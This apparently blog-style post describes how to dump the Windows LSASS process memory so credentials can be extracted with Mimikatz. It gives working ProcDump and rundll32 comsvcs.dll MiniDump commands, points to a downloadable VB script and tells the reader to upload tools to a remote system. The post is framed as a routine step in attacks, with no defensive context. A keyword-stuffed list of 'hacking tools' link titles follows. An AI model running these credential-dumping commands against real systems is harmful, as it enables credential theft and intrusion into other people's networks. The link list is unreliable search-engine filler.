In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.
Here are some of the important methods,
Using ProcDump :
1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"
Using VB Script :
Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp
rundll32 Command :
Essentially previous method VBS script is using following command for dumping Lsass.exe process
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full
So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.
More information
- Best Pentesting Tools 2018
- Pentest Tools Github
- How To Make Hacking Tools
- Pentest Tools Review
- Hacking Tools And Software
- Pentest Tools Kali Linux
- Pentest Tools Free
- Pentest Tools For Windows
- Hack Tool Apk No Root
- Pentest Tools For Ubuntu
- Hacking Tools 2019
- Hack Tools Pc
- Tools 4 Hack
- Hacking Tools For Games
- Hacking App
- World No 1 Hacker Software
- Hacker Tools Github
- Hack Tools For Pc
- Hacker Tools Linux
- Hacking Tools For Windows
- Hacking Tools 2019
- Hack Website Online Tool
- Pentest Tools Review
- Hack Tools Online
- Hacker Tools List
- Hacking Tools 2020
- Nsa Hack Tools
- Hacking Tools For Windows Free Download
- Pentest Tools Online
No comments:
Post a Comment